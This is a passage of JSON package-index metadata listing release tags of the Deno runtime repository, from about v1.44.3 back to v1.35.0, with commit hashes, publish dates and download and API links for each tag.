thub.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.